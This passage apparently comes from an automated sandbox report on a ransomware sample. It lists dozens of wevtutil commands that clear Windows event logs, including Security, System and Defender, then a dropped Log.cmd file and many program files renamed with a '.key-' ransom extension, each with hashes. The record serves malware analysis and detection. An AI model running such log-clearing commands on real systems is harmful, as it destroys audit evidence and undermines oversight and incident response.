C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TunnelDriver

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC-FileVirtualization/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAnimation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIRibbon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBHUB/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBPORT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-User-Loader/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserModePowerService/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceMetadata/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceNotifications

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/SchedulerOperations

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UxTheme/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VAN/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VDRVROOT/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VHDMP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeControl/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeSnapshot-Driver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WABSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WCN-Config-Registrar/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WER-Diag/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WFP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WFP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLAN-AutoConfig/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLAN-Autoconfig/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLANConnectionFlow/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMI-Activity/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPDMCCore/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPDMCUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSS-Service/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSSUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-ClassInstaller/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-ClassInstaller/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-CompositeClassDriver/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-CompositeClassDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-MTPClassDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WSC-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WUSA/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-MM-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-SVC-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-UI-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebIO-NDF/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebIO/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebServices/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Concurrency

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Power

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Render

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/UIPI

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinHTTP-NDF/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinHttp/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinINet/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Windeploy/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsBackup/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsColorSystem/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsColorSystem/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsSystemAssessmentTool/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsSystemAssessmentTool/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsUpdateClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wininit/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-AFD/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-WS2HELP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsrv/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wired-AutoConfig/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wired-AutoConfig/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-mobsync/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ntshrui

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-osk/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-stobject/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl OAlerts

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Security

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Setup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl System

Network

N/A

Files

C:\Users\Public\Log.cmd

MD5 6a2f870841e0126632f5b9bf0d000d6a
SHA1 51689e26641f0eb054cd90553a21a472a2e79148
SHA256 4bcbb565ad2fd05a4fc458cd68254853cbcbf5749beffccb2b1e22b8a53ecb2f
SHA512 de089c5d2dd691c64e38bdc82a2a5266e65cf8f9fc40e2d60ecded7a775922ae5100cc406f09346fbaf402fc1fe3074ca29ecd64119f7c490381aee72780bdb0

memory/748-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/748-6-0x0000000001D40000-0x0000000001D48000-memory.dmp

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 ce2aa00a9c7636bdada7dc6e86ec31d4
SHA1 d023a510fe3b564ce80decbb3b79f257d29c74a2
SHA256 2ee1c1a96b829b32ad5e739b8293c04512e4a4e30f16d2312828136b843026cb
SHA512 edaa54fa1746c22488ad63d068effbd2f71fc86a0b7994af2dbc05d22d8b5cf858c0f8c93cd8c5efe59fe4d2e1955b80b5412e0114bb27785ab5e74e7af39b4d

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 f79c7f75abeab78049ee1b696fdc7478
SHA1 5a7fa1a3107e31749af04d9a69e3ac527dc8d3d8
SHA256 edd384c4a063ef349672b22b5c2f4ced9f855b2d0387d4f0f4a430350515bcbc
SHA512 6f671161274cf6052bfdc5dfb0076d516c328047992dcc8e86d414eb92675fb149b358c860eecb38d9ec2d4a90de3eb5022c0c24e2c535f29a5d7166868b85c9

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 1183d34132159a801276da3058547270
SHA1 980c686089f500fda4724a8651a86ae9f9b83f7a
SHA256 00232978790508f71222e2390433bdd1a15b6a382ccc198766a1ceeac48c99df
SHA512 84db462c8e5613a57fb890f8869e33edf8a1666ea7c7a0a629640c32e9f0cfa345dcb824bccb9ebadb35661495081fb73a21999b385e3796d4f12b566b640a8b

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 aecfd47f1150a74c9921bf41429a93f1
SHA1 2572a4d7bf4dfc294ab6785b5eb1127397aeee22
SHA256 29c8acca4e56b3148a1de90bd0a79da3e3cd7304ed9d2b13774bd51c28b06bd4
SHA512 f06f7bc3b771137b3b2fe1258dd96d557df1866a4d772c0a4f3c31fabddac48824b4533a94d509616ec750fea21ef8fe0d414ed97e68e45291e8d729a2beec1a

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 cf6fb4fc2b16c59bbdd610ad291c7be3
SHA1 d0ce9fff07870cdcf0695d6ad4907b7a29d76327
SHA256 c595590b46b3fb0ab8cec3eee25076ca6da8e9a50d01d6767112c270f0f42150
SHA512 336cb935b71af0a101fa454ad5413c17c99d5ba7c5b10f2e7226fa6a0b299923ed4527c5d122a2244ddb9df0b8b290915a12c8bbfad5316c59b4d226d60fbc11

C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 3376e7a933d307118c25251c10925187
SHA1 701ce13ef10aabf4af167ed2757035f0de796329
SHA256 47b30bc2cd62be1094bbe3953e8be4ca1b4a0facda80edaa40f3886aa38bd1bb
SHA512 9725244de2585e19d13dfa02d67b84cfa7237c147947d1cb0746c46dc6a7bc0e7f721f163d98804f14dda64f52eb04f45d4922c86287bb8c083af0849794443b

C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 23fd661f9cc86c3fc999e975f137967c
SHA1 821c0b5aa16b96454d5436e3e8f6b359c2b71651
SHA256 826127c2b0e6a13e958a43ecea4a06058c918ebad548c0a8197e99b41cbc7f55
SHA512 297047e52069697df2bace2a9b8f55334a374d0ecd91092313926fbb8c518e58e4099c486b7b12b28691b29535137ef45602465b2c63613c3f6fd4bdce68d1cd

C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\15x15dot.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 e79be0d060808c84a14abaf4e1ee2bc3
SHA1 9590cd325b32f988013a25875862bf908f2e34d3
SHA256 988a0c2249ed816bd5bb4831ed4fb41bf4aa5ddd8c1bf7ee3a5837c46083f97d
SHA512 d1947ab77229a3f755a4861fd14f66ccc8e67f9f374bbec4afc6584ac6ceb825310146c3a6c3d904dfd22d370fbf81c9d2dbd10b626ba90f168cfbb8d63be5ab

C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\203x8subpicture.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 c303ec0feedacbc85646fe1297c59109
SHA1 b2af4f80ab60e8543ce03439b75fad9ffd8716aa
SHA256 8f46586f4dcefbd4d3ce564645cd2d790e2473eb8fbab76103e4b18f3c5fe332
SHA512 0b9dfcf27aaa86da9949317281eca427cf7bfa8d22336c11c5db4930c5159125b5bb4a978389870f98034e7e171cd5f2dd51e958277654b5fbf77ecb9389462a

C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.key-YEEISFLSETDV.0xcf41769d063c9

MD5 62a57ba3dbb0c69476d4efd848abb8c5
SHA1 2185463679423322481f1039b634a53952bb5504
SHA256 c78e6310c713baf1330bb1a958b801a7adbadb33f84fc419bf2c8014261bb40d
SHA512 9d4d064a245de67fb285e0dc3b3cee609bf2adaeee3bb9bd5655ce900601dc8cd591e5f311df47e980b06692da27e20d48c1e942d1ffb56654e67de3983c9c6e

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 5cd7d81912b3c547069a6d60cb8432a9
SHA1 c3ab0d5b03828a4e0616b28a09550cbba1b243e2
SHA256 6e2711ffd4d58f6193b3fc5b47cb5ca0322395dae3bdf0a50c328584028003fe
SHA512 2c19d2b19a45f563340f65ef709afd04f4c1ffdb8620dada3e0bdecfe0beef5f3f4b67389482fbf5e44239754eae0f43d9d6f9a2a081043bb364bee52eecb444

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 18aa5c8a2060906cabcd075f25d6971f
SHA1 c6e6812055f86197556fb10380d86b7069f82d8e
SHA256 0e77b921f0342cc931d6e11ca4e345cb6f3100d68dea912abce139ae0de6563f
SHA512 9a9daf406c6b7eb168de798970815374eae244635bb25a890bdb975cbc992eb7ae383052061f7880609e5245ce46c0f886967622357abb93c9e543fd39a4a496

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.key-YEEISFLSETDV.0xcf41769d063c9

MD5 bde7e407d6c979fbbc51578db586b444
SHA1 e66f9e424d3fd95f68f2b230b2741a672682b6d3
SHA256 97cb2f74999481c42b4f2ad463387dfc3564fc8e9c16998f5f78240bad5079ee
SHA512 ce1fe9783288fd919f5c717fc9f19a6ff37a75f7cf683dc0f1cb50bf31e63f033a6b4ad18cb71631110fc8afde5ebdcdf75c9b535e32039827f3c71ae90a6d9f

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.key-YEEISFLSETDV.0xcf41769d063c9

MD5 566cf081a3316f361451738aab9c0d53
SHA1 f3a084126e9170fbde5c27935a716207f189c34c
SHA256 ad1cec42ab911f458b53a3d2b700542e653eabed830092a43c08b118979bf5e5
SHA512 7e7fbf834be9e75ed1aed18a94685c46fb9caa25569ca9202d3d0e2f59247905a4d0f90aef45e603c3422c98bd0c0adb1204690318f7d2df4c13c5ead3959561

C:\Program Files\Java\jre7\bin\plugin2\msvcr100.dll.key-YEEISFLSETDV.0xcf41769d063c9

MD5 e64b7bbe8546af2feec986f9d6649270
SHA1 7550c2917d7d2c571b8043c3f89f6cc490620671
SHA256 2fae4c2d3ec0042f199983bca7233e8b010068e8ec0a1ddbd66bf647634c04bd
SHA512 0095fb1a0e57495edec293ebac09cd45b1db0391c6de150c909e063cde721252debcf8ede7189df3b6d80bfbb7e68e4559af82395bcdd485eff3686bc7711733

C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif.key-YEEISFLSETDV.0xcf41769d063c9

MD5 4e6878e1dc23649c00be49079afa6dc3
SHA1 1ce7f499260052022fb1b291e950098aa0e4edb3
SHA256 62b154c93d38414e647dde621b6ad3a6a22c4b1357ca950912e3ed06ed5f7c30
SHA512 621b2849ff00ff1456cecc30cb59bdf9921f78ddd4a37c03f724e22d7572c7f6f11647a73a4ee58e8b01507f24f83edadd022ace5efe3c42edafed57fd6ddff6

C:\Program Files\Java\jre7\lib\zi\Etc\GMT.key-YEEISFLSETDV.0xcf41769d063c9

MD5 3137c57d68f05211847688c97b4d235a
SHA1 35a7b20494f1e18f56bf62dfb2d139e85c0e1763
SHA256 591cc1d4f289a93ec9d716fa1abbd7a48b691c5b3643dba3c683c7eecca03571
SHA512 c660ffbcc7af9c425c6c09c0ae1b6b3f5ab0e990fd9f8d8647357de370a6a3534b321315d04ab37da3b5f718eab52cda30c953b1b77c52bde4335a15f3fe0a7b

C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5.key-YEEISFLSETDV.0xcf41769d063c9

MD5 7af2125dc2a907e9d8f8f71bcb861968
SHA1 7b39e8b6599bcbd9c0bb6def9509ddfbf2ebeb08
SHA256 2eb23da4920adf1436470f502f718ffb734432795be05263fa19851bb508d459
SHA512 ebc6bdfdcac39ebcda605d5bfa35dc1ef35c39f06aa590fed7f3bfd72aab0e5fe1d151c8423e940d8ac3df95ffe2786d692bf9eb1a568a159f99788b961f2df6

C:\Program Files\Java\jre7\lib\zi\HST.key-YEEISFLSETDV.0xcf41769d063c9

MD5 7b4baf8030663e94624508c9210c77e9
SHA1 60f396cfc1f3bbf4b01ab5b4999ac57846dcaf9b
SHA256 aab95ca58814eb9203dcc3dbd9c1304acd89423d89a80eb2096eb06f353eb840
SHA512 51fff77743b0b80f4473c3adff86f63f0305dd8aeb77959a55e760c6e22e74adc9ab0fe9aa8be095a4757deabdfbd4d1de24bcf30327f1dd9777fe37c87126da

C:\Program Files\Java\jre7\lib\zi\MST.key-YEEISFLSETDV.0xcf41769d063c9

MD5 792a285cb45f9db796366c59fc7a5bf3
SHA1 21ce3ad8c776a9bcce100f7e6dde1efe12a85f1e
SHA256 77aa5c907a7cb632657516d2694a604d21491712cd2956a84603e6412cf20b34
SHA512 811692774d2eb6e9b8cfab6b612f1a398330a1bc054bcd00f6db297e27ca836631440d3a23a4cfbd36a8bf63200d30e9d91fd9ed69a092a993d1f0984c9c34a2

C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo.key-YEEISFLSETDV.0xcf41769d063c9

MD5 e531ed3d053b71c157425cea81434c46
SHA1 4a7840f37f716fec26a721924daab208e6d8f93b
SHA256 e77e6a432ba242e9a05521d1de046a1df69ceb5cbce6352664e4ec9a83916cd4
SHA512 64b186f06b1df44095ee42384b29de290faca31adfb6d174f0aae84f4020c72951b07cfba5df04ed4801a76477c86f3f30a97c796a7b233cd48b613e672451c9

C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 d5477689ae58d3c70ff5f74a6c7dc179
SHA1 ca14da79e4ab6e2f93a7a3e50f777fbb915f9324
SHA256 bb256736ef061053bb63a64d072b336a7d6690bf69f44981a688521e056ee2ab
SHA512 417d4655dde4414ad60ea37ffe77b11c57ce25c808d68497b2e3f9668a06ebf1fe8d35ee93faaecf2f93e09430155663ba81426b44e0aced013f416fb7f355e9

C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\cpu.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 bdf5d1abe010fba9d1142a28a4dd123d
SHA1 1ebc803db0cba309a23993b830cff2b229fb6732
SHA256 fed69b70d393833572d4900ff4b2d477091a236df4cadb6ba3f4567c23269424
SHA512 2daa9fc157b26270efffdb45e35404e7ec4a28504a1e58c6cb81236097cc67fb833c621cd33655ce4b6ca30ac144c4a04c08ebd48d8846d4c697aefd512f76d8

C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\calendar.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 fd7a13d080d1a41b1e21d71560f92e43
SHA1 1b966c1002657c865438f7b5b94d6ee5e35dcc52
SHA256 ad0c3473f268b959f67b1e523e99e5932ab96a95f6e18f83b5c800cf214ad53a
SHA512 a779b8aeb6046055ee13f776a47fa4d24fc1d20e9aa07ee468dc0e798b2f7377f2576ff53defce7a21e15dd8e8c13bc137a27da34ec15b8ede773aed0c2e7f7e

C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\css\clock.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 a96da39acc67c586e49772d1c867629f
SHA1 b5c56faed81cd95cb5584d02a78f9ebaa8f8cb9e
SHA256 c3110a5620eb0276a4185f7323293d03875e56cc1493952121ca0191acf0c550
SHA512 2a229c98a6c3316ca1510a03742871c4eb8fb0ae66a584d1ce4f296fb99b58b2515f74d516eb230a17c8383580c1fe3d27db7eb810ddfbdfaa525373cf4a5670

C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 dde82db73b277388b6875d7cd9af38ab
SHA1 a71a53a596e08aa81b74b1d929f8ea9ac57478a0
SHA256 d24842944c6fd8aad927379fe5a0963015fd8625817efc9c5b31ecd3b6b038a2
SHA512 604c5ebcc3c7c0500be580dadb43879bc416df25b9d9a729967edf7e5392d87a6139d44dc493695c8018a60d2e9fa5b1a8cd2e4a1c0d3f166c54319af85701c4

C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\js\clock.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 be306972d8110a4817d014fc1c4c8a28
SHA1 8ee29894aa43a5e53ef24c9e43e74b6cdf146cd5
SHA256 8e5c76b3d0256e3b9fa9912fde0bc41e1af223ed5282d97e7ef962d1b5a37b35
SHA512 14660bfd8a48f0519ef96f573dca80d7eacd67b87226a13ef904967731edbf8edf932f6c444a6bd82d78789ea7aa2ae2e57321428d8c2091157d4cd8101e6165

C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\js\timeZones.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 a9f3b17299882457364e16b6976a8cba
SHA1 ea8e248887c083967936cde1566b035288c8658c
SHA256 f026ca4ec11b880ae9e441a6aefb56f58083606bd7ad3dc500786703cb3d34df
SHA512 78559c822baf619d63f0a16fabebdd6d05b01140a20b2c2634c7c95c1e6e7de4c15615040c851aa71d0895a043948dcfbb896165c54cbbadfb55db5603f6d579

C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\currency.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 958548fbcee5a334e347e5f241e7d7d1
SHA1 7ea7acf8ae7f09ec83d35f8cabd41bb72e0b5999
SHA256 0990b34ebd066b4c983cf0ea40ea30dece17923d3daa3b2d71b70984a2360889
SHA512 07ab72c5bea7358a7ad618ebad5a1341b0ba99022c631ef0adf0e21f4ddb4cc8cdac515e2bbd8508882314157d9e52b54ba66cfc93ec29b26eccdead9c7657cf

C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\currency.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 a6d4a4b25d64dd3b6ece3610e052ab52
SHA1 f64d5be12fa109195e08266c55af415114404c62
SHA256 49066e4422b855a36d7771cce16cff595d6c2cd240ecaf7b0125e2f6f6a6e561
SHA512 864c91c409dbdccec5afe085070419cf80fcb407149a91ce78c25dd85f4ff9b292075d8f5612e1b048a4bb38854c58129af0c4729045b90c8d2bd7ab7454dbdc

C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\init.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 651af6636158994c909660ff5f9a4c3d
